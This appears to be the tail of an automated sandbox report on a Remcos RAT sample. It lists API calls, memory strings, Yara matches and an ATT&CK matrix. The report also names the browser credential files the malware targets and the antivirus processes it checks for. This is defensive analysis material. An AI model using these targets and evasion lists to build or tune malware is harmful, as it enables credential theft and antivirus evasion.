                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerrasystem.com:
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN|
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\q3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\h3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\
                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerZ3
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\]3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager%|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQD\\sppsvc.pif|
                    Source: sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA24C52 cpuid 28_2_1BA24C52
                    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF789BD3140
                    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF789BD3140
                    Source: C:\Users\Public\kn.exeCode function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,25_2_00007FF67DF43800
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: CoInitialize,WinExec,EnumSystemLocalesA,28_2_028ACE0C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: EnumSystemLocalesA,28_2_028B3AD5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoA,28_2_1B9FF8D1
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoW,28_2_1BA4230A
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoW,28_2_1BA42313
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoW,28_2_1BA388ED
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: EnumSystemLocalesW,28_2_1BA42036
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: EnumSystemLocalesW,28_2_1BA41F9B
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: EnumSystemLocalesW,28_2_1BA41F50
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_1BA42610
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoW,28_2_1BA42543
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,28_2_1BA41CD8
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_1BA4243C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: EnumSystemLocalesW,28_2_1BA38404
                    Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,29_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,29_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,29_2_00007FF789BD3140
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,36_2_029A5A3C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029BCE0C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029BCE0C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoA,36_2_029AA6F8
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoA,36_2_029AA744
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029C3AD6
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,36_2_029A5B48
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: EnumSystemLocalesW,36_2_210B2036
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,36_2_210B20C3
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoW,36_2_210B2313
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoW,36_2_210B2543
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: EnumSystemLocalesW,36_2_210A8404
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,36_2_210B243C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,36_2_210B2610
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoA,36_2_2106F8D1
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: GetLocaleInfoW,36_2_210A88ED
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,36_2_210B1CD8
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: EnumSystemLocalesW,36_2_210B1F50
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: EnumSystemLocalesW,36_2_210B1F9B
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF789BC6EE4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE98018 GetUserNameExW,GetLastError,#357,wcschr,TranslateNameW,GetLastError,#359,#145,GetLastError,#73,#357,#208,#36,#26,GetLastError,#140,#357,LocalFree,#41,#224,#13,25_2_00007FF67DE98018
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA39365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_1BA39365
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC586C GetVersion,4_2_00007FF789BC586C
                    Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data36_2_2106BA12
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\36_2_2106BB30
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: \key3.db36_2_2106BB30

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\Public\Libraries\sppsvc.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFMutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: cmd.exe36_2_2106569A
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,25_2_00007FF67DE75648
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,25_2_00007FF67DE554A0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,25_2_00007FF67DE6E568
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,25_2_00007FF67DE5227C

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		21
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		311
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		14
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts12
                    Native API                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol211
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    System Shutdown/Reboot
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		1
                    Abuse Elevation Control Mechanism                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Non-Standard Port                    		Automated Exfiltration1
                    Defacement
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		11
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		NTDS1
                    System Network Connections Discovery                    		Distributed Component Object ModelInput Capture1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		LSA Secrets3
                    File and Directory Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Windows Service                    		1
                    Timestomp                    		Cached Domain Credentials58
                    System Information Discovery                    		VNCGUI Input Capture14
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items22
                    Process Injection                    		1
                    DLL Side-Loading                    		DCSync61
                    Security Software Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                    Registry Run Keys / Startup Folder                    		1
                    Bypass User Account Control                    		Proc Filesystem51
                    Virtualization/Sandbox Evasion                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                    Masquerading                    		/etc/passwd and /etc/shadow3
                    Process Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                    Valid Accounts                    		Network Sniffing1
                    Application Window Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                    Virtualization/Sandbox Evasion                    		Input Capture1
                    System Owner/User Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
                    Access Token Manipulation                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers22
                    Process Injection                    		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
